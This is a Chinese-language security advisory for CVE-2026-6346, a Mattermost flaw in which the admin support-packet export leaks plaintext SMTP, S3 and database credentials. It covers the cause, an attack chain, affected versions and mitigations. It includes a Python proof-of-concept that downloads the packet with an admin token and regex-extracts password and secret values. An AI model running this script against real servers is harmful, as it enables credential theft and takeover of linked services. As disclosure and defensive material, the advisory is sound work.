CVE-2026-6346: Mattermost敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-6346

漏洞类型

信息泄露

CVSS评分

8.7 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Mattermost

漏洞概述

Mattermost在特定版本（11.5.x, 10.11.x, 11.4.x）中存在安全缺陷，即在生成系统支持数据包的过程中，未能正确清理和过滤敏感配置字段。这一漏洞使得拥有系统管理员权限的攻击者，或任何能够接触到该支持数据包的第三方，都可以通过下载数据包的方式，直接读取到明文形式的敏感凭据，从而引发严重的信息泄露风险。

技术细节

该漏洞的根本原因在于Mattermost系统控制台的“支持数据包”生成功能缺乏必要的数据清洗机制。当系统管理员尝试导出技术支持所需的数据包时，程序会自动收集系统日志、配置文件及环境变量。然而，代码逻辑未对这些源数据中的敏感字段进行识别或掩码处理，导致诸如SMTP密码、S3存储密钥、数据库连接凭证等高敏感信息被原样打包。
在利用层面，虽然CVSS向量显示攻击需要高权限（PR:H），但这通常意味着内部威胁或已被攻陷的管理员账户。攻击者利用此权限访问系统管理后台，找到“导出支持数据包”的选项并执行下载操作。获取到的压缩包解压后，攻击者只需通过简单的文本搜索工具即可定位明文凭证。由于机密性和完整性影响均为高，泄露的凭证可能允许攻击者完全接管关联的外部服务或数据库，造成连锁反应。

攻击链分析

STEP 1

1. 权限获取

攻击者需要获取Mattermost系统管理员权限的账户凭据。

STEP 2

2. 访问后台

使用管理员账户登录Mattermost系统控制台。

STEP 3

3. 下载支持包

在系统管理界面找到“导出支持数据包”功能并触发下载。

STEP 4

4. 提取凭据

解压下载的数据包，搜索配置文件以获取明文敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC script to simulate downloading and analyzing a Mattermost support packet
# Note: This requires a valid admin session token.

import requests
import zipfile
import io
import re

TARGET_URL = "https://mattermost.example.com"
ADMIN_TOKEN = "YOUR_ADMIN_SESSION_TOKEN"

# Step 1: Download the support packet via API
headers = {
    "Authorization": f"Bearer {ADMIN_TOKEN}"
}

print("[*] Attempting to download support packet...")
response = requests.get(f"{TARGET_URL}/api/v4/system/supportpacket", headers=headers)

if response.status_code == 200:
    print("[+] Support packet downloaded successfully.")
    
    # Step 2: Extract and search for sensitive patterns
    with zipfile.ZipFile(io.BytesIO(response.content)) as z:
        print("[*] Analyzing files in the packet...")
        for filename in z.namelist():
            with z.open(filename) as f:
                content = f.read().decode('utf-8', errors='ignore')
                
                # Search for common credential patterns (simple regex)
                passwords = re.findall(r'"(?:Password|Secret)"\s*:\s*"([^"]+)"', content, re.IGNORECASE)
                
                if passwords:
                    print(f"[!] Potential sensitive data found in {filename}:")
                    for pwd in passwords:
                        print(f"    - {pwd}")
else:
    print(f"[-] Failed to download packet. Status code: {response.status_code}")

影响范围

Mattermost 11.5.x <= 11.5.1

Mattermost 10.11.x <= 10.11.13

Mattermost 11.4.x <= 11.4.3

防御指南

临时缓解措施

立即升级到官方发布的修复版本。在无法立即升级的情况下，应严格控制系统管理员的权限，并禁止随意生成和分发系统支持数据包。如果怀疑数据包已被泄露，必须立即重置所有相关的敏感凭据。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6346
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6346
3 Details https://www.cvedetails.com/cve/CVE-2026-6346/
4 VulDB https://vuldb.com/cve/CVE-2026-6346
5 Link https://mattermost.com/security-updates